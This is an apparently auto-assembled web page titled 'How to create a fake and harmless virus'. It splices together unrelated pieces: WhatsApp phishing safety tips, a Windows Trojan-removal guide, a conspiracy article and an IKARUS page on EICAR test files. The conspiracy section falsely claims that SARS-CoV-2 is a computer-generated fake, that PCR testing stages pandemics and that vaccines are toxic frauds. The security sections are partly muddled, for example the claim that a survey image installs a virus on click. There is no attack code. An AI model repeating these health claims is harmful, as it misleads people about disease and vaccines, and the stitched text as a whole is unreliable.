    Surveys

    This is another way to hack WhatsApp. When a big brands such as Amazon or Starbucks request a survey, then it’s most likely that people respond. How is it possible to fake such a big name? Easy. Hackers just create a random survey, which is basically code. They insert the Trojan or virus within the survey. Then, they download an image or a logo and insert it within the message.

    The moment your phone clicks on the message, the virus automatically downloads within the phone.

    How do you keep yourself safe from such phishing attempts?

    WhatsApp doesn’t send emails about payments, updates, images or missed messages. They definitely do not send voice messages.

    The next thing you can do is to download a very strong anti-virus. Fair warning, the free versions don’t do you much good. The paid versions, however, always scan any incoming data for virus or ransomware and keep your phone safe.

    Anti-virus software also provide special plug-ins for internet browsing. Google has special virus scanners that can detect malware, or the like, when you upload something to Google Drive. Hence, it’s safe to store your data with Google.

    What to do when you suspect an infection?

    If you believe someone had tried to hack WhatsApp on your phone, you can do the following.

    1. Use a strong anti-virus software or application to run a security check.
    2. In case it displays results, then the software prompts you to delete the same. Just click ok and it will take care of the rest.
    3. If you are still not satisfied, you can reset your phone. Resetting removes all data that is stored in the phone memory and hence, your phone is as good as new.

    How to recognize that your phone is infected

    Here are some ways to detect that someone has tried to hack WhatsApp or breach WhatsApp security:

    1. Your phone is suddenly very slow.
    2. You suddenly start getting unnecessary pop-ups.
    3. If you notice that your device is getting hotter than usual.
    4. You see a number of strange apps that you don’t remember downloading.
    5. If you notice a loss of data such as documents, images, videos, etc.
    6. Apps suddenly are slower.

    Conclusion

    There is a lot someone can do with intel on you. People whose phones have been infected often lose data. Sometimes, hackers send virus through WhatsApp to steal identities. Loss of money, cyberbullying and kidnapping are some other unfortunate crimes that occur due to hacking. Hence, always take precaution to stay safe.

    How to create a fake and harmless virus

    Have you noticed that your computer runs slowly? It takes a long time to download pages that used to open quickly. The machine itself sounds like it’s working hard when it is supposed to idle. If that is the case, you are probably dealing with the Trojan type of malware. From this article, you will learn how to remove Trojan and other hostile software from your PC. You’ll also get to know more about the protection of your system.

    What is a Trojan?

    The name Trojan derives from the expression Trojan horse, meaning something tempting and harmless that later turns out to be threatening and dangerous, like the wooden horse full of Danai warriors that the Greeks presented to Trojans. When the Trojans allowed the horse beyond the gate, Troy was doomed. Any program that is not what it disguises itself as is called Trojan.

    Trojans are not strictly speaking viruses, as they cannot self-replicate and require a user to install them. Nevertheless, they can inflict a lot of damage themselves and expose your machine to various more grave threats.

    How harmful are Trojans?

    Trojans can use the resources of your computer for various purposes. These can be cryptocurrency mining or DDoS attacks, for example. These background activities are probably the least harmful Trojan activities since they are easily detectible. They show themselves through the low running speed of your machine and possible errors from time to time. Trojans can also collect personal data from the PC on which they operate and send it to their designers for all sorts of subsequent villainy. No doubt, Trojans can also be designed for hijacking a particular machine as a part of a planned malefaction.

    Basically, any Trojan lowers the performance of your PC, slows webpage downloading, and generally spoils the user experience.

    What is much more dangerous is a Trojan whose purpose is to prepare an attack on your computer through the so-called backdoor. Trojans can do that, therefore you must know how to remove Trojan malware and avoid them ever after.

    How a Trojan can end up on your PC

    Trojans mislead users of their true nature. Therefore, they end up on your PC either disguised as a program you might want to download or as a supplement to the software you are installing. Therefore, whichever downloaded installer you run, watch out for barely visible tick boxes you need to uncheck. Otherwise, you will get malware and whatnot alongside what you need. But most importantly, seek trustworthy resources. The Internet is a more civilized place now than it used to be. You can catch a lot of malware, but if you browse trusted websites, the probability of this happening is low. Think twice before you download an installer of a program from a dubious website, the more so before opening a torrent file. Check out Reddit threads on reliable web resources. You will spare yourself many nerve cells.

    CONSIDER READING: Is uTorrent safe?.

    How to remove Trojan malware from a computer?

    There are several steps to be taken if you suspect that a Trojan operates on your PC unbeknownst
    to you. Here they are:

    Remove Trojan with Windows 10 in-built security measures

    Windows 10 has an in-built free antivirus known as Windows Defender. Why not try to use
    it?

    • Use the Start Menu search bar, type Windows Security and access the found item.
    • In Windows Security, click Virus & Threat Protection in the left-hand menu
    • In the opened window, click Scan Options (below the Quick Scan button).
    • Check the Full Scan radio button and click Scan Now.

    How to create a fake and harmless virus

    It is crucial that you launch Full Scan, so proceed to Scan Options and choose Full Scan.

    Allow your PC to finish the scan uninterruptedly and see if any malware is detected
    and removed.

    Use Safe Mode

    Windows Safe Mode is a way to run the system with only the essential programs being launched automatically. It can be useful if the Trojan you are trying to remove or some other malware hampers your antivirus from doing its job. In Safe Mode, the virus will not be able to do it. To activate the mode, do the following:

    • Press Windows+R, and Windows Run will start.
    • Type mscofig and hit OK.
    • The System Configuration window will open. Select Boot tab.
    • There check the Safe Boot tick box in the Boot Options panel.
    • Press Apply and restart your PC. It will launch in Safe Mode.

    How to create a fake and harmless virus

    Use Boot tab in System Configuration to boot your system in a Safe Mode.

    Removing Trojan with additional anti-malware software

    Various antivirus programs have different virus bases. Therefore, some software will detect certain malware, and some won’t. To maximize your protection and cleanse the malware Windows Defender might ignore, you can employ additional anti-malware software. We recommend GridinSoft Anti-Malware. This program can work both as a Windows Defender substitute for constant background protection and as a scanning tool for your system.

    If your computer is blocked by malware so that you cannot even access Windows, you can use the portable version of GridinSoft Trojan Killer. You’ll need to have it on a flash memory drive. If you face this unfortunate situation, consider reading our manual on using Trojan Killer Portable.

    System Restore

    Windows Restore is a way to save Windows from pretty much any software trouble. If you have saved a Restore Point, you can roll back Windows to it, getting back all files and settings of that time, deleting everything that appeared later. Obviously, the question is whether you have a restore point that would satisfy your needs, not just return the system to its ten-years-ago state.

    From our manual on Windows 10 Restoration, you will learn how to create a Restore Point and use it if you are lucky to have one.

    Re-install (Reset) Windows

    As a last resort, if all the rest of the recipes don’t work (which is highly unlikely), you can reset your system. Mind that this process will wipe out all your files from your computer and re-install Windows anew. If you have already made up your mind, here’s what you need to do.

    How to create a fake and harmless virus

    Choose Remove everything, otherwise the Trojan file will remain intact.

    After you reboot, the Trojan will be gone, so as all of your files. Be very attentive! Before you reset the system, make sure there is no other way to kill the Trojan. Ask a specialist to be absolutely sure.

    Your Source for Alternative News

    Fake or harmless viruses have been used by the medical profession to fool humanity in the past

    So much coming out of my head today…

    I am trying to get as much content out as possible because I have a free day.

    In this article, I hope to point out a few things that many people do not understand concerning the business of faking viral epidemics/pandemics.

    Along with others, I have claimed since the beginning of the COVID-19 pandemic that the sars-cov-2 virus is a fake pathogen. I have based my assertion on the facts that no sars-cov-2 viral isolates have ever been isolated in totality from an infected living animal or human host. I have also based my opinion on the fact that the virus’s published genomic structure was created using computer modeling. For all intents and purposes, sars-cov-2 is a CGI production.

    The other disturbing fact surrounding the COVID-19 pandemic psyop is that the diagnostic tool used to generate millions upon millions of false-positive case numbers is a PCR test.

    The inventor of the PCR test, the late Kary Mullis, went on the record and stated that his test should never be used to detect or diagnose infectious diseases in animals or human beings.

    The PCR test was never meant to be used in clinical settings on patients. Despite Kary Mullis’s explicit instructions, the PCR test has been used to diagnose the presence of sars-cov-2 in humans worldwide. But that’s not the only instance where the PCR test was used to diagnose infectious diseases to create the illusion that other menacing viruses were on the loose and terrorizing citizens globally.

    SOME OTHER FAKE OR HARMLESS VIRUSES DIAGNOSED BY A PCR TEST:

    There are others…

    PCR tests detect common genetic materials from animal and human subjects that can then be over-amplified in a laboratory setting. Depending on the degree of overamplification, the PCR tests can create an unlimited number of false-positive results for the medical profession.

    All of the above-listed viruses (infectious diseases), in my opinion, were made to look like credible biological threats against humanity by inappropriately using the same PCR diagnostic technology. These practices were done despite explicit warnings not to do so by the technology’s inventor.

    When you are selling toxic vaccines and antiviral products that do the real physiological damage in human patients, a PCR test and other diagnostic tools based on similar science can be employed to create the illusions of viral epidemics and pandemics.

    The scientists and doctors behind the scenes at the highest level have been working on these medical psyop schemes for many decades, and I believe they perfected the sleight-of-hand psychological operations before rolling out the great plandemic of 2020.

    COVID-19 was not the controlling powers’ first carnival show. These elitists have been faking infectious diseases forever by either creating fake viruses using computer modeling technology or overhyping harmless ones. The fraud, be it a fake or harmless virus, is set into motion and given credibility by introducing fake case numbers. The PCR tests generate a massive number of fake case numbers. The alleged damage coming from a specific disease is brought to fruition by administering the medicines and vaccines allegedly designed to mitigate or manage the different disorders.

    Psychopaths have victimized society for a long time. People worldwide have been hoodwinked into believing that viral microbes that are either nonexistent or harmless ingredients in our natural environment are out to kill us all. We have been tricked into believing the giant lie that vaccines and synthetic medicines are necessary to make our biological systems stronger to ward off microbes (weapons) of mass destruction

    For IKARUS anti.virus and IKARUS mobile.security

    Test viruses allow you to test the functionality of your antivirus program and reaction to malware without any risk.

    To download, please move the mouse pointer over the link, press the right mouse button and select “Save Link as …” These are self-extracting archives, which have to be started and can be used after the download.

    EICAR test virus

    The EICAR test virus is not a real virus. It is a DOS program created by the European Institute for Computer Antivirus Research, which only displays the message “EICAR-STANDARD-ANTIVIRUS-TEST-FILE” on the screen and then terminates itself. The aim of test viruses is to test the functions of an anti-malware program or to see how the program behaves when a virus is detected.

    Download the desired test file to your PC. If your network security does not already prevent the download of the file, the local antivirus program should start working when trying to save or execute the file. Since the Eicar test virus is the only standardized way to monitor antivirus programs “live” at work without endangering yourself, it is likely that all programs will recognize the file. However, it says nothing about the detection or other protection capabilities of the software. If the file is not detected by your virus scanner, it is advisable to investigate the reason for this, for example to detect possible malfunctions.

    Android-App „TestVirus“

    To test your Android security solution, we also offer a “TestVirus” app on Google Play. This is of course not “real” malware, but a harmless test file that should be recognized by all Android virus scanners.

    This app can be used to test the functionality of security apps and to monitor the behavior of the app in case of a threat: The IKARUS TestVirus should be treated like a “real” pest and rendered harmless by warning the user of the infection and deleting the file.

    The Android security app IKARUS mobile.security displays the message “IKARUS TestVirus” when the file is detected. Other antivirus programs will rename the file or simply classify it as virus or malware. The detection of the IKARUS TestVirus, however, does not say anything about the other detection or protection features of a security app.

    Suggested links :

    How to create a fake and harmless virus

    Tips to better secure Smart Home devices

    Cybersecurity for financial service provider: DORA on the way

    Data recovery after Ransomware DeadBolt

    Manufacturing at No. 1 of cyberattacks in 2021

    Mandiant becomes part of Google Cloud

    The evolution of ransomware attacks

    Identities in the focus of cybercriminals

    Safer Internet Day: Playfully strengthening digital skills

    WE ARE LOOKING FORWARD TO HEARING FROM YOU!

    IKARUS Security Software GmbH Blechturmgasse 11
    1050 Vienna

    Phone: +43 (0) 1 58995-0
    Sales Hotline:
    +43 (0) 1 58995-500

    SUPPORT HOTLINE

    Support hotline:
    +43 (0) 1 58995-400

    Support hours:
    Mon – Thu: 8am – 5pm
    Fri: 8am – 3pm

    MORE INFORMATION

    This site uses cookies. By continuing to browse the site, you are agreeing to our use of cookies.

    Cookie and Privacy Settings

    We may request cookies to be set on your device. We use cookies to let us know when you visit our websites, how you interact with us, to enrich your user experience, and to customize your relationship with our website.

    Click on the different category headings to find out more. You can also change some of your preferences. Note that blocking some types of cookies may impact your experience on our websites and the services we are able to offer.

    These cookies are strictly necessary to provide you with services available through our website and to use some of its features.

    Because these cookies are strictly necessary to deliver the website, refuseing them will have impact how our site functions. You always can block or delete cookies by changing your browser settings and force blocking all cookies on this website. But this will always prompt you to accept/refuse cookies when revisiting our site.

    We fully respect if you want to refuse cookies but to avoid asking you again and again kindly allow us to store a cookie for that. You are free to opt out any time or opt in for other cookies to get a better experience. If you refuse cookies we will remove all set cookies in our domain.

    We provide you with a list of stored cookies on your computer in our domain so you can check what we stored. Due to security reasons we are not able to show or modify cookies from other domains. You can check these in your browser security settings.

    We also use different external services like Google Webfonts, Google Maps, and external Video providers. Since these providers may collect personal data like your IP address we allow you to block them here. Please be aware that this might heavily reduce the functionality and appearance of our site. Changes will take effect once you reload the page.

    Google Webfont Settings:

    Google Map Settings:

    Google reCaptcha Settings:

    Vimeo and Youtube video embeds:

    You can read about our cookies and privacy settings in detail on our Privacy Policy Page.